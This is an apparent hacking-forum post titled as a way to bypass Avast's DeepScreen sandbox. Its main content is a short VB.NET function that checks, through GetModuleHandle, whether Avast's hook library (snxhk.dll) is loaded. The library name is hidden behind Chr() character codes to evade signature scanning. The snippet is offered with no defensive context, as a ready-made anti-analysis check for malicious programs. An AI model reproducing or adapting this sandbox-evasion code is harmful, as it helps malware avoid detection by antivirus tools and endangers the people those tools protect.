Jump to content
io.kent

Bypass Avast DeepScreen (SandBox) .NET

Recommended Posts

Posted
Private Declare Function GetModuleHandle Lib "kernel32" Alias ??"GetModuleHandleA" (ByVal lpModuleName As String) As Integer
Private Function CheckForAvastSandbox () As Boolean
Try
If GetModuleHandle (Chr (115) & Chr (110) & Chr (120) & Chr (104) & Chr (107) & Chr (46) & Chr (100) & Chr (108) & Chr (108)) Then
Return True
Else
Return False
End If
Catch ex As Exception
Return False
End Try
End Function

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...